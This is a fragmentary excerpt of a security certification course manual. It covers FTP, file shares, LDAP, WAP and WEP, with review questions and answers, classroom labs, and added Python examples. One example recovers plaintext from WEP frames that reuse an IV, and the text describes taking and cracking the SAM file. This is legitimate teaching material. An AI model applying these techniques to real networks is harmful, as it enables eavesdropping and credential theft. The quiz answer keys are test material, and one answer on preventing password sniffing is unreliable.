The key words in this quote are similar to ftp. Because of the protocol's name, Secure FTP, one might expect that S/FTP is a method of securing traditional FTP, but it is not. The only relationship between S/FTP and traditional FTP is that S/FTP employs the older variant's command syntax. Rather than a protocol, S/FTP is an FTP-like program provided as part of the SSH suite to securely transfer files. S/FTP does not provide any new network protocols; it only provides an FTP-like user interface to use the existing SSH2 encryption mechanisms to transfer files. Notice that SSH's Secure File Transfer Protocol (S/FTP) should not be confused with the Simple File Transfer Protocol (SFTP) defined in RFC 913. The latter is easier to implement than the original FTP, and the former is not a protocol at all, but a program that leverages SSH to securely transfer files between hosts.

Secure Shell's S/FTP standard has a number of benefits over traditional FTP:

S/FTP uses the underlying SSH2 protocol, so it offers strong authentication using a variety of methods, including X.509 certificates.
Because it uses SSH2, S/FTP encrypts authentication, commands, and all data transferred between the client and the server using secure encryption algorithms.
Because SSH2 uses a single, well-behaved TCP connection (as compared to active FTP, which opens a reverse connection, and passive FTP, which opens a connection on a random high port), it is easy to configure a firewall to permit S/FTP communications. S/FTP uses the same TCP port as SSH2, port 22.
Because traditional FTP clients and servers negotiate the IP address and port for opening the data connection, it's difficult to use Network Address Translation (NAT) on FTP connections. S/FTP avoids this issue altogether because no negotiation is required to open a second connection.
The following table displays Secure FTP implementation programs:

Program | Note
SSH | The SSH product produced by the company of the same name, offering both server and client software. http://ssh.com/support/downloads/
OpenSSH | An open source version of SSH. http://sshwindows.sourceforge.net/
PuTTY | A freeware SSH client implementation for Windows operating systems. www.chiark.greenend.org.uk/~sgtatham/putty/
Do it!
B-4:
3 With blind FTP sites, a user logs on as anonymous, but is then restricted to a single directory and is not able to obtain a listing of files in the directory. True or false?
True
4 In passive FTP, the server initiates the data connection to the client. True or false?
False
5 The terms active and passive in FTP refer to the client's role in setting up the data connection. True or false?
False: It refers to the server's role.
7 Audits for file shares should be conducted in complete secrecy. True or false?
False: Audits should be conducted with management approval, including any required change management sign-offs, and should be carefully documented.
File shares
Explanation A common way of sharing files is using file shares on a Microsoft Windows network. This method was originally intended to share files on a local area network (LAN) rather than across the Internet as FTP is used, although current versions of Windows allow mapping via IP connections. File shares are popular because they are easy to set up, and they use the Windows graphical interface. Very little computer knowledge is required for people to share files across the network using file shares; one simply views the file's or folder's properties and selects the appropriate check box, as shown in Exhibit 7-5.
Exhibit 7-5: File sharing in Windows Server 2003

Shared files can be configured as peer-to-peer (so that multiple desktop computers can access files on another desktop computer) or as client/server shares (set up to provide users with centralized network storage on a server).
Vulnerabilities
Although file shares seem both harmless and indispensable, there are indeed several risks that security administrators need to manage carefully.

First, there is the risk to confidentiality of data: because most users control file sharing on their own desktop computers, they can open shares on their machines that could accidentally become liabilities. Take, for example, an accountant who shares his My Documents folder to let his coworkers access his collection of MP3 music files. If the accountant accidentally saves a spreadsheet containing the salaries of all employees into the same folder, he could inadvertently give confidential information to people who should not have access to it.

Second, there are viruses that spread via network shares. If many users on the network have unmonitored and uncontrolled network shares, they can cause malware such as the Funlove virus to spread rapidly, damaging files and causing huge losses to productivity as administrators battle the infection and workers are unable to perform their functions because their programs no longer work.

Finally, other types of critical information besides user documents could become compromised if file shares are misconfigured. One example of this is the C: drive on Windows machines. If the entire drive were accidentally shared, then an attacker has the ability to access important files in the C:\Windows directory. In this case, an attacker could launch a denial-of-service attack on the machine by deleting critical files, or could download the SAM file that contains the username and password of everyone who has ever logged onto the machine. After downloading the SAM file, an attacker can crack it using tools such as L0phtCrack.
For more details on how to use these tools and auditing best practices, see Jaime Carpenter's article entitled Open File Shares: An Unexpected Business Risk in the SANS Reading Room (www.sans.org/rr/).
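An added example (not from the course) that applies the three risks just described to a list of share definitions: it flags an entire drive or a system directory being shared, a user profile folder shared to everyone, and broad groups such as Everyone being granted Change or Full Control. The Share records are constructed sample data; on a live server they would be filled in from each share's Permissions dialog, and audit and findings are names chosen here.

```python
from dataclasses import dataclass

# Permission levels that let a principal modify or delete files through the share.
WRITE_LEVELS = {"Change", "Full Control"}
# Principals that effectively mean "anyone on the network".
BROAD_PRINCIPALS = {"Everyone", "Authenticated Users", "Users", "Domain Users"}
# Paths (after the drive letter) that hold system files, including the SAM database.
SYSTEM_DIRS = ("\\windows", "\\winnt", "\\program files")
# Paths that hold users' own documents, like the accountant's My Documents folder.
PROFILE_DIRS = ("\\documents and settings", "\\users")


@dataclass(frozen=True)
class Share:
    name: str
    path: str     # local folder the share exposes, for example C:\ftp
    access: dict  # principal -> "Read", "Change" or "Full Control"


def is_drive_root(path):
    """True for a share that exposes a whole drive, such as C:\\ or C:."""
    p = path.rstrip("\\")
    return len(p) == 2 and p[1] == ":"


def path_under(path, prefixes):
    """True if the path (after its drive letter) is one of the prefixes or inside one."""
    _, _, rest = path.partition(":")
    rest = rest.lower().rstrip("\\") + "\\"
    return any(rest.startswith(prefix + "\\") for prefix in prefixes)


def findings(share):
    """Return the risk statements that apply to one share; an empty list means no finding."""
    out = []
    if is_drive_root(share.path):
        out.append("entire drive shared: exposes the Windows directory and the SAM file")
    elif path_under(share.path, SYSTEM_DIRS):
        out.append("system directory shared: critical files can be read or deleted")
    elif path_under(share.path, PROFILE_DIRS):
        out.append("user profile folder shared: documents saved here leak to everyone with access")
    for principal, level in share.access.items():
        if principal in BROAD_PRINCIPALS and level in WRITE_LEVELS:
            out.append(f"{principal} has {level}: malware can spread through the share "
                       "and files can be altered or deleted")
    return out


def audit(shares):
    """Map each share name to its findings, omitting shares with none."""
    report = {}
    for share in shares:
        hits = findings(share)
        if hits:
            report[share.name] = hits
    return report


# Constructed sample share list for this example.
SAMPLE_SHARES = [
    Share("Dangerous", "C:\\Dangerous", {"Everyone": "Change"}),
    Share("C", "C:\\", {"Everyone": "Read"}),
    Share("Music", "C:\\Documents and Settings\\accountant\\My Documents",
          {"Everyone": "Read"}),
    Share("Reports", "D:\\Reports", {"Finance": "Change"}),
]

if __name__ == "__main__":
    for name, hits in audit(SAMPLE_SHARES).items():
        for hit in hits:
            print(f"{name}: {hit}")
```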
C-1:
Can share files on a LAN
Can share files over an IP connection
Can be configured as peer-to-peer
Can be configured as client/server

Sharing confidential data
Spreading viruses
Compromising system files
All of the above
Review questions
1 Information about network resources is stored as a(n) __________ in the directory services database.
object
2 A commonly used directory service protocol that was developed by the IETF is __________.
LDAP
4 PKI, user administration, and single sign-on are some of the applications of LDAP. True or False?
True
5 List the elements in the X.500 hierarchical structure from the top to the bottom.
Root, country, organization, organizational unit, leaf objects
7 LDAP provides authentication and authorization services. It also provides encryption by utilizing other protocols. True or False?
True
8 List the security vulnerabilities you need to protect your LDAP service from.
DoS, man-in-the-middle, and attacks against data confidentiality
9 List the steps you can take to secure the LDAP server from the vulnerabilities that can affect it.
Apply the latest OS and application security patches, remove unneeded services and applications, configure strong authentication, block LDAP at the firewall.
10 FTP is one of the most secure services on the Internet. True or False?
False
13 List some of the FTP security issues you should guard against.
Bounce attacks, clear text authentication and data transmission, glob vulnerabilities, software exploits and buffer overflow vulnerabilities, anonymous FTP and blind FTP access.
14 The default settings for an FTP site is to require usernames and passwords. True or False?
False: The default is anonymous access.
15 How can you prevent password sniffing when users are connecting to an FTP server?
Restrict access to the site by IP address. A user trying to access the site would have to provide a valid username and password, and would have to access the site from the appropriate computer.
12 On your computer, display properties for the Dangerous folder. Change the permissions for the group Everyone to allow Change. (Activate the Sharing tab, click Permissions, check Change in the Allow column.)
13 On the other computer, try saving the file again.
14 Were you able to save it now?
Yes
15 On the first computer, check the text file for modifications.
Next, you'll scan your own computer for file shares using Legion. This file can be found under packetstormsecurity.nl/groups/rhino9/.
16 Download the file legionv21.zip according to your instructor's directions.
17 Unzip the file to C:\Security.
18 Run the Setup program Setup.exe.
19 Click Next at the Welcome screen.
20 Click Next at each screen to accept the defaults. Click Finish to exit the installation program.
21 Click Start, then choose All Programs, Legion to run the program.
22 Enter the starting IP address in the Scan from text boxes.
23 Click Scan.
24 What file shares were detected on your computer?
Dangerous should appear in the share list.
25 Close Legion.
802.11a
The IEEE approved the 802.11a standard in 1999 and titled it High-speed Physical Layer in the 5 GHz Band. This standard sets specifications for an additional type of data transmission at the Physical layer: the Coded Orthogonal Frequency Multiplexing (COFDM) protocol. The COFDM layer provides data transmission rates of 6, 9, 12, 18, 24, 36, 48, and 54 Mbps, a major improvement over the 5.5 Mbps or 11 Mbps offered by 802.11b. The radios consist of either wireless NIC cards or wireless access points (APs), and they operate by converting the digital and analog signals between the client and the wired network. Communications are established at the fastest possible data rate, which is dependent upon the distance between the client and network and the strength of the signal. One major benefit of operating in the 5 GHz band is that 802.11a devices do not have to compete with many other devices, such as cordless phones, microwave ovens, and baby monitors (though baby monitors are usually not a problem in a corporate environment).
802.11b
The 802.11b standard was approved in 1999, concurrently with 802.11a. The IEEE named the 802.11b standard the Higher-Speed Layer Extension in the 2.4 GHz Band. The IEEE also established specifications for an additional type of data transmission at the Physical layer: the High-Rate Direct Sequence Spread Spectrum (HR/DSSS) protocol. This protocol allows for data transmission at either 5.5 Mbps or 11 Mbps (which is as fast as standard Ethernet and much faster than most Internet connections) instead of the mandatory 1 Mbps or the optional 2 Mbps data transmission rate offered by the original 802.11 standard. In 2001, the 802.11b standard came under heavy criticism because of security flaws in WEP. The Wireless Ethernet Compatibility Alliance (WECA), an equipment testing and certification group, created a standard based on 802.11b that is dubbed Wi-Fi, a trademark that is short for wireless fidelity.
802.11c
The IEEE working group C was responsible for creating 802.11c, which would develop MAC bridging functionality. This group was folded into the 802.1D standard. 802.1D is focused on MAC bridging in wired LANs and should not be confused with 802.11d.
802.11d
The IEEE working group D is responsible for determining the requirements necessary for 802.11 to operate in other countries and incorporating those requirements into 802.11d. The work of this group continues.
802.11e
The IEEE working group E is responsible for creating the 802.11e standard, which will add multimedia and Quality of Service (QoS) capabilities to the MAC layer and therefore guarantee specified data transmission rates and error percentages. This proposal is still in draft form. When this work is completed, it will have a beneficial effect on 802.11a, 802.11b, and 802.11g. The 802.11e standard will also impact 802.15, which is assigned the task of creating wireless personal area networks (Wireless PANs), and 802.16, which is assigned the task of creating Wireless MAN standards. Without an improvement in QoS, many of the benefits of higher rates of data transmission, such as video streaming and wireless Voice over IP (wireless VoIP), will not materialize.
802.11f
The IEEE working group F is responsible for creating the 802.11f standard, which will allow for better roaming between multivendor access points and distribution systems (different LANs within a WAN) than is currently feasible under 802.11.
802.11g
The IEEE working group G created a draft 802.11g standard, which was approved in June 2003. This standard offers a raw data throughput rate of up to 54 Mbps, five times higher than 802.11b. The 802.11g specification is backward compatible with the widely deployed 802.11b standard.
802.11h
The IEEE working group H is responsible for creating 802.11h, which is required to allow for European implementation requests regarding the 5 GHz Physical layer. Two requirements of this standard are that it limits the PC card from emitting more radio signal than is needed and allows devices to listen to radio wave activity before picking a channel on which to broadcast. This standard was approved in 2003.
802.11i
The IEEE working group I is responsible for fixing the serious security flaws in WLANs by developing new security standards. This standard was approved in 2004; however, it's apparent that its initial medium-term intent was to create a new standard that would be at least somewhat backward compatible with the original WEP so that a total transformation of existing equipment need not be necessary. This fix will probably involve increasing the number of required bits in the temporal keys to 128, the use of fast packet keying, and key management. In the long term, the working group hopes to eliminate WEP altogether and replace it with what it is calling the Temporal Key Integrity Protocol (TKIP), which would require that keys be replaced within a certain amount of time. As discussed in the WEP section of this unit, WEP does not currently require these keys be replaced at all.
802.11j
The IEEE working group J "Wireless LAN Medium Access Control (MAC) and Physical Layer (PHY) Specifications: 4.9 to 5 GHz Operation in Japan" addresses Japanese government regulations regarding the use of Wireless LANs in the 4.9 and 5 GHz bands in indoor hot spot, fixed outdoor, and nomadic or mobile modes. This was approved in November 2004. A summary of IEEE 802.11 working groups is provided in the following table:
Working group | Primary task | Status of work
802.11a | Worked to establish specifications for wireless data transmissions in the 5 GHz band | Approved 1999
802.11b | Worked to establish specifications for wireless data transmission in the 2.4 GHz band | Approved 1999
802.11c | Worked to establish wireless MAC bridging functionality |
802.11d | Working to determine requirements that will allow 802.11 to operate outside the United States | Approved 2001
802.11e | Worked to add multimedia and Quality of Service (QoS) capabilities to the wireless MAC layer | Approved 2005
802.11f | Worked to allow for better roaming between multivendor access points and distribution systems | Approved 2003
802.11g | Worked to provide raw data throughput over wireless networks at a rate of up to 54 Mbps | Approved 2003
802.11h | Worked to allow for European implementation requests regarding the 5 GHz band | Approved 2004
802.11i | Worked to fix security flaws in WLANs by developing new security standards | Approved 2004
802.11j | Worked to address meeting Japanese government requirements for 4.9 to 5 GHz band use | Approved 2004
The IEEE is dealing with all of the technology issues that arise as it tries to set standards for wireless data transmission and processing. At some point, all of these groups will have completed their work, and other challenges will arise that need to be dealt with as time goes on.
Do it!
A-1:
3 Which of the following data transmission rates does 802.11b support? (Choose all that apply.)
5 Which of the following working groups is responsible for fixing the security flaws in WLANs?
A-2:
Here's how
Introduce this activity as a demonstration. Students should observe only.
1 Connect the Category 5 Ethernet network cable to the Linksys WAP11 Access Point
2 Connect the other end of the cable to the classroom switch or hub
3 Connect the AC Adapter to the WAP11 power port and to an electrical outlet
Use the Instructors PC to demonstrate the installation procedure.
The Access Point is now connected to your 10/100 network. To avoid damage to your unit, only use the power adapter supplied with the Access Point.
4 At the laptop PC, insert the Linksys Setup Wizard CD in the CD-ROM drive
The Welcome Screen appears. If the autorun program does not start, choose Start, Run, and enter D:\setup.exe (if D: is your PC's CD-ROM drive).
5 Click Setup
6 Click Next
Click Yes
8 In the Password field, enter the default password, admin
Changing the SSID field from the default is important in order to protect the LAN from intrusion.
Click Next
(To continue through the Security (Optional) screen.) The Confirm Your Network Settings screen appears.
Click Exit
(To complete the basic setup.) The Access Point is now configured for the classroom network.
These protocols were based on the International Organization for Standardization OSI Model, but were different enough from it to require that data communications between clients (wireless devices) and servers pass through a WAP gateway, which in effect converts the data from one type of network protocol to another.

The Wireless Application Layer (WAL) corresponds to the HTML layer, but unlike the HTML layer, which allows for a wide variety of content formats that can consume large amounts of processing power and be displayed on large computer screens, WAE was designed only to specify lightweight formats, such as text and image formats, and to leave decisions related to browser types, phonebooks, and the like to device vendors.

The Wireless Session Protocol (WSP) provides connection-oriented and connectionless-oriented session standards that require a relatively limited number of information exchanges between the wireless device and the server compared to the number of information exchanges required between a wired device and the server. Connection-oriented session services that require reliable data transmission operate over the Wireless Transaction Protocol (WTP) layer, while connectionless-oriented session services operate over the Wireless Datagram Protocol (WDP).

The WTP operates over the WDP or the optional WTLS layer. This layer allows for either reliable or unreliable transactions and, like other WAP 1.x layers, has been designed to limit the number of transactions necessary to allow data transport, relative to the number of transactions necessary in the OSI/Web stack.

The Wireless Datagram Protocol (WDP) is the bottom layer above the carrier layer. WDP differs greatly from the UDP layer of the OSI/Web stack in that it allows operability over a great variety of mobile networks, while the UDP layer must operate over an IP network.

Another significant difference between wireless and wired data transfer lies in the network architectural structures of the two network types.
Exhibit 8-3 illustrates the differences between a WAP network's and a wired network's architecture.
B-1:

2 The WAP 1.x lower layer is similar to what layers of the OSI Model? (Choose all that apply.)

3 WAP is a proprietary encryption protocol that was created by WECA. True or false?

False: WAP is an open protocol stack created by the WAP Forum, not an encryption protocol; encryption in WAP 1.x is provided by the optional WTLS layer.

Answer choices (question stem not reproduced):
A In the WAP client
B In the WAP gateway
C Between the WAP client and the application server
D Between the WAP gateway and the application server
E None of the above
This process works quickly and requires less overhead than TLS, largely because WTLS uses shorter (weaker) keys, which take less processing time. Remember that in WAP 1.x WTLS is optional, so it might not even be turned on, and that it encrypts data only between the client and the WAP gateway. The WAP gap is still present between the moment the gateway has finished decrypting the data and the moment it re-encrypts it with TLS for the application server; anyone with access to the gateway sees the data in plaintext.

SSIDs

Another area of concern is the unsafe use of service set identifiers (SSIDs). SSIDs are wireless network names, sent in the clear with wireless frames to help devices identify each other in a wireless network. The default SSID values should never be used, nor should SSIDs that help an attacker with a sniffer work out whose WLAN this is; examples include 12th Street Branch Accounting Department or ABC Consulting Firm. Giving your wireless devices nondescriptive SSIDs helps reduce the likelihood that an attacker singles out your WLAN(s). An SSID is not a secret, however: it is still broadcast, so a cryptic name is a hygiene measure, not a substitute for encryption and authentication.

Weak encryption keys

The weak keys used by WTLS have been widely criticized. Some WAP supporters have responded that the shortcuts taken in WTLS were necessary for WAP to fit the constraints of the wireless environment. The weaknesses are real and should be considered when transmitting sensitive information with a WAP-enabled device. Although many vendors have improved WAP 1.x devices with stronger encryption and more efficient processing, it cannot be emphasized enough that WTLS cannot be taken for granted, even if a vendor has made these improvements, or simply states that its application incorporates WTLS.
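SSIDs travel in the clear in every beacon frame, alongside the capability bits that announce whether privacy (WEP) is even enabled. The following Python is an added example, not code from the course manual or from any vendor: it parses the body of an 802.11 beacon (timestamp, beacon interval, capability information, then tagged information elements) and flags the weaknesses discussed in this topic, a default or owner-revealing SSID and a clear privacy bit. The frame bytes, the list of default SSID names and the descriptive keywords are constructed for illustration.

```python
"""Parse an 802.11 beacon frame body and report its SSID and Privacy bit.

Added example, not from the course manual. The frame bytes built below are
constructed for illustration; the field layout (timestamp, beacon interval,
capability information, then tagged information elements) is the standard
802.11 beacon frame body.
"""
import struct

ELEMENT_ID_SSID = 0
ELEMENT_ID_RATES = 1
CAPABILITY_ESS = 0x0001
CAPABILITY_PRIVACY = 0x0010   # bit 4 of the capability field: WEP/privacy enabled

# Default SSIDs shipped by common vendors of the period (constructed list).
DEFAULT_SSIDS = {"linksys", "default", "tsunami", "wireless", "wlan", "netgear"}
# Words that identify the owner and invite targeted attacks (constructed list).
DESCRIPTIVE_WORDS = ("accounting", "finance", "branch", "consulting", "payroll", "hr")


def parse_beacon_body(body: bytes) -> dict:
    """Return timestamp, interval, capability flags and the information elements."""
    if len(body) < 12:
        raise ValueError("beacon body too short")
    timestamp, interval, capability = struct.unpack_from("<QHH", body, 0)
    elements = {}
    offset = 12
    while offset + 2 <= len(body):
        element_id, length = body[offset], body[offset + 1]
        value = body[offset + 2: offset + 2 + length]
        if len(value) != length:
            raise ValueError("truncated information element")
        elements.setdefault(element_id, value)   # keep the first copy of a duplicated IE
        offset += 2 + length
    return {"timestamp": timestamp, "interval": interval,
            "capability": capability, "elements": elements}


def ssid_of(parsed: dict) -> str:
    """SSID as text; a zero-length element means the AP is not broadcasting its name."""
    raw = parsed["elements"].get(ELEMENT_ID_SSID, b"")
    return raw.decode("utf-8", errors="replace")


def assess(parsed: dict) -> list:
    """List the configuration weaknesses the beacon itself reveals."""
    findings = []
    ssid = ssid_of(parsed)
    if not parsed["capability"] & CAPABILITY_PRIVACY:
        findings.append("privacy bit clear: traffic is sent unencrypted")
    if ssid.lower() in DEFAULT_SSIDS:
        findings.append("default SSID still in use")
    if any(word in ssid.lower() for word in DESCRIPTIVE_WORDS):
        findings.append("SSID names the owner or department")
    return findings


def build_beacon_body(ssid: str, privacy: bool, interval: int = 100) -> bytes:
    """Construct a minimal beacon body (test input; real beacons carry more IEs)."""
    capability = CAPABILITY_ESS | (CAPABILITY_PRIVACY if privacy else 0)
    ssid_bytes = ssid.encode()
    # Supported Rates IE: 1, 2, 5.5 and 11 Mbps, basic-rate bit set.
    rates = bytes([ELEMENT_ID_RATES, 4, 0x82, 0x84, 0x8B, 0x96])
    return (struct.pack("<QHH", 0x12345678, interval, capability)
            + bytes([ELEMENT_ID_SSID, len(ssid_bytes)]) + ssid_bytes + rates)


if __name__ == "__main__":
    for name, priv in (("linksys", False), ("12th Street Branch Accounting", True), ("k7q-2", True)):
        parsed = parse_beacon_body(build_beacon_body(name, priv))
        print(f"{ssid_of(parsed)!r:36} findings: {assess(parsed) or ['none']}")
```

Run against a live capture, the same parser applied to the beacon body of each received frame is what a war-driving tool does to produce the "x% of networks had WEP enabled" statistics quoted later in this unit; the privacy bit is read straight off the air, no association required.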
Exhibit 8-4: A comparison of WAP 1.x and 2.0 stacks

In addition to these changes, WAP 2.0 added a number of features. These include, but are not limited to:

WAP Push  Allows content providers to send information, such as stock prices and advertisements, directly to the WAP device without its being requested.
User agent profile  Provides a way to capture and communicate WAP device capabilities and user preferences.
Wireless Telephony Application  Provides a range of advanced telephony applications, including call-handling services such as making, answering, placing, or redirecting calls.
External Functionality Interface (EFI)  Allows plug-and-play modules to extend the features of the client's applications, and allows the addition of smart cards, GPS devices, health-care devices, and digital cameras.
Multimedia Messaging Service (MMS)  Provides a framework for a richer messaging solution.
B-2:

2 WTLS's Class 3 authentication requires the use of a tamper-resistant device called a ________________________________________.

Wireless Identity Module (WIM)

3 Put the steps below in the correct sequence to describe a Class 2 authentication.
3 The client generates a unique random value and encrypts it with the public key.
2 The gateway sends a copy of its certificate containing its public key.
1 The client sends a request for authentication to the gateway.
4 The gateway decrypts the encrypted value with its private key.

4 What are SSIDs?

SSIDs are wireless network names, which are sent with wireless data packets to help devices identify each other in a wireless network.
Do it!

B-3: Controlling access to the WAP (demonstration only)

Here's how / Here's why

Introduce this activity as a demonstration. Students should observe only. Steps 1-13 should be done on the instructor's computer.

The Access Point is designed to be functional right out of the box. To implement greater security on your wireless network, you will use Linksys's Web-based configuration utility (for example, http://192.168.1.251).

2 In the Address field, enter http:// followed by the IP address of your Linksys WAP
   The system prompts you for a user name and password.

3 Leave the user name blank. In the Password field, enter admin, then click OK
   The configuration utility appears with the Setup tab active. This tab allows you to change the Access Point's general settings.

4 Review the settings, but leave the AP Name, LAN IP Address, and AP Mode settings at their default values
   The AP Name and LAN IP Address were set during the initial setup. The AP Mode is set to Access Point by default, which connects your wireless PCs to a wired network.
   To communicate with another wireless access point, you have two options: (1) if both are in the same network, choose Access Point Client, which makes this WAP a client of the other WAP; (2) if you want to connect two networks together, select Wireless Bridge, which connects to another access point that is also set as a wireless bridge. In both cases you specify the other WAP's MAC address. To connect three or more networks together, choose Wireless Bridge-Point to MultiPoint.

5 Activate the Password tab

6 Enter a new password, and re-enter it to confirm
   To avoid using the default password. Be sure to choose a complex password.

7 Click Apply
   To save the change.

8 Enter the new password and click OK
   To return to the utility.

9 Activate the Filter tab
   One method of restricting wireless devices is to create a list of approved stations. A list of pre-approved media access control (MAC) addresses can be entered into the Filtered MAC Address table in the access point; only those stations on the ACL will be admitted. The Linksys WAP11 provides an option to create and manage such an ACL. Note that a MAC address is not a secret: it is sent in the clear in every frame and can be copied onto an attacker's adapter, so MAC filtering raises the bar only slightly and must be combined with encryption and authentication.

10 Select Enabled
   Filtering is enabled.

12 In the MAC 01 field, enter the MAC address of the wireless adapter in the computer with the wireless adapter (laptop or desktop)

13 Click Apply

Steps 14 and 15 are done on the computer with the wireless network adapter.

14 From the computer with the listed MAC address, load Internet Explorer

15 Enter the IP address of the WAP in the Address field
   The page fails to load.

16 In the MAC 01 field, enter the MAC address of the wireless adapter in the computer with the wireless adapter, and click Apply

Step 17 is done on the computer with the wireless network adapter.

17 From the computer with the listed MAC address, retry accessing the WAP by its IP address
Introducing WEP
Explanation  Wired Equivalent Privacy (WEP) is the optional security mechanism specified by the 802.11 standard to provide authentication and confidentiality in a wireless LAN (WLAN) environment. Even though the IEEE committee recommended that WEP be used, it also stated that WEP should not be considered adequate security on its own and strongly recommended that it not be deployed without a separate authentication process and external key management. Before delving into WEP, however, you must first understand what a WLAN is and how it operates. A WLAN connects clients to network resources using radio signals to pass data through the air, as depicted in Exhibit 8-5.
Review with students the operation of a typical wireless LAN as depicted here. Notice that critical resources, such as servers and internetwork devices, are still connected using wired technologies so WLANs are frequently really hybrids that incorporate both wired and wireless components.
CompTIA Security+ Certification

To do this, it employs wireless access points (APs), as shown in Exhibit 8-6, which are connected to the wired LAN and act as radio base stations that transmit data to clients equipped with wireless network interface cards (NICs), as shown in Exhibit 8-7.
Exhibit 8-7: 3Com AirConnect wireless NIC

This allows users to stay connected to the network as they move from place to place within and between the coverage areas of the various access points (APs) in the WLAN. WLANs use WEP to encrypt the data passed between the client and the AP, to check its integrity, and to authenticate clients requesting network resources.

WEP's weaknesses

WEP has been criticized for many problems, including problems related to the initialization vector (IV) it uses to encrypt data and protect its integrity, and problems with how it handles keys.
An IV is a sequence of bytes prepended to the plaintext data before encryption and sent along with the frame. There are several problems with the WEP IV:

- WEP sends the IV in plaintext across the WLAN, so an attacker can read it along the way.
- The WEP IV is only 24 bits long, so it can take only 2^24 (16,777,216) values; on a busy network the IV space is exhausted within hours.
- The IV is reused on a regular basis. An attacker who captures packets can spot the reuse; two frames encrypted with the same IV and key use the same RC4 keystream, so XORing the two ciphertexts cancels the keystream and exposes the XOR of the two plaintexts. Researchers have broken 128-bit WEP in as little as two hours using this kind of analysis.

In August 2001, Fluhrer, Mantin, and Shamir published a paper titled Weaknesses in the Key Scheduling Algorithm of RC4. In it they described an attack using the weak keys that WEP's IV construction creates. They also criticized the fact that the RC4 stream cipher, effective in many other settings, is undermined in WEP because WEP forms each per-packet key by concatenating a known IV with a fixed secret key.

Key sharing

Others have criticized WEP for not providing per-device authentication in which each wireless device would employ its own secret key. Instead, every wireless device in a WLAN shares a common secret key, which increases the likelihood of that key reaching someone who wishes to harm the organization. Standard WEP requires the secret keys to be configured manually. Rational security practice then dictates that the secret key be changed on every device each time someone leaves the company, if not more frequently, but that is an administrative nightmare in large organizations. A shared symmetric key system, in itself, also does nothing to protect critical information from authorized WLAN members who, intentionally or unintentionally, gain access to resources they are not authorized to use.
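To see why IV reuse is fatal rather than merely untidy, the following Python is an added example (not from the course manual): a plain RC4 implementation keyed WEP-style with IV || shared key, two frames encrypted under the same IV, and the recovery of the second plaintext from the first using only the two ciphertexts. The key, IV and frame payloads are constructed; the integrity check value is omitted.

```python
"""Why a repeated WEP IV is fatal: same IV + same shared key gives the same RC4
keystream, and XORing two such ciphertexts cancels it.

Added example, not from the course manual. RC4 is implemented inline (it is
short); the shared key, IV and frame payloads are constructed for illustration.
"""

IV_BITS = 24
IV_SPACE = 2 ** IV_BITS          # 16,777,216 possible IVs, as the text states


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key-scheduling algorithm followed by the output generator."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):                    # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """Byte-wise XOR, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(shared_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP per-packet encryption: RC4 keyed with IV || shared key (ICV omitted)."""
    if len(iv) != IV_BITS // 8:
        raise ValueError("WEP IV must be 3 bytes")
    return xor(plaintext, rc4_keystream(iv + shared_key, len(plaintext)))


def recover_with_known_plaintext(c1: bytes, c2: bytes, p1: bytes) -> bytes:
    """Given two frames encrypted under the same IV and one known plaintext,
    recover the other plaintext without ever learning the key.
    c1 ^ c2 == p1 ^ p2 because the identical keystream cancels out."""
    return xor(xor(c1, c2), p1)


def demo() -> bytes:
    shared_key = bytes.fromhex("0badc0ffee1234567890abcdef")   # 104-bit key (constructed)
    iv = bytes.fromhex("00a1f3")                                 # reused IV (constructed)
    # An attacker often knows p1 exactly, e.g. the fixed LLC/SNAP header plus an
    # ARP request he provoked. Here p1 is a constructed 'known' frame.
    p1 = b"AA AA 03 00 00 00 08 06 known frame"
    p2 = b"GET /payroll/q3 HTTP/1.0 secret"
    c1 = wep_encrypt(shared_key, iv, p1)
    c2 = wep_encrypt(shared_key, iv, p2)
    return recover_with_known_plaintext(c1, c2, p1)[:len(p2)]


if __name__ == "__main__":
    print(demo())
```

The recovered bytes equal the second frame's plaintext exactly, which is why the 24-bit IV space matters: once an attacker has captured two frames under one IV, the key never has to be attacked at all.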
Another weakness related to the difficulty of rekeying is that if it is not done regularly, attackers have even more time to break into the system.

War driving and other issues

In addition to the WEP-related problems discussed so far, wireless LANs have other security holes. WLAN transmissions can, and often do, extend beyond the physical structures of the organizations that use them; unlike wired LAN traffic, they are much easier for outsiders to detect and capture. Several articles in widely read publications such as PC Magazine and the Wall Street Journal describe how much information about an 802.11b WLAN can be collected through war driving. War driving involves driving around with a laptop equipped with a wireless card and an antenna. Craig Ellison wrote an article for PC Magazine in 2001 describing how he used this method to detect 61 APs within a six-block radius of the Ziff Davis office in Manhattan. Of these, only 21% had WEP enabled; the other 79% were broadcasting their transmissions in plaintext for anyone to pick up. On other war-driving trips through Jersey City, Boston, and Silicon Valley, Ellison easily found 808 networks, and only 38% of them were using WEP.
In addition to war driving, which is a fairly passive activity, unauthorized users can attach themselves to WLANs and use their resources, set up their own access points, jam the network in a denial-of-service attack, or use the WEP weaknesses described above to break into wired LANs through WLANs that are not separated from the wired LAN by a DMZ. WEP authenticates clients, not users. Unless an additional security method is employed, such as requiring users to provide a username and password, anyone who gains access to a client that holds the shared key is able to get into the system. 802.11i will help in this area, but perhaps the greatest need is to educate wireless network administrators and users about the inherent insecurity of wireless systems and the need for additional care when using them.
WEP key
The 802.11 standard provides an optional Wired Equivalent Privacy (WEP) specification for data encryption between wireless devices to increase privacy and prevent eavesdropping. The access point and each station can have up to four shared keys. Each key must correspond to the same key position in each of the other devices.
C-1: Generating a WEP key (demonstration only)

Here's how / Here's why

   The WEP Key Setting window appears. This window allows you to set WEP encryption.

4 Select 128Bit encryption, and leave the Mode set to HEX

5 In the Passphrase field, enter Paganini1
   Your screen should look like this:

   Each point in your wireless network MUST use the same WEP encryption method and encryption key, or your wireless network will not function properly.

7 Click Apply
   To save the changes.

8 Close the window
   To return to the Setup tab.

9 Click Backup, and save the file to your local hard drive
   To store the Access Point configuration on your local PC.

10 Click Apply
   To complete the setup.

11 At this point, you would configure each device in your wireless network with the same configuration and encryption keys.
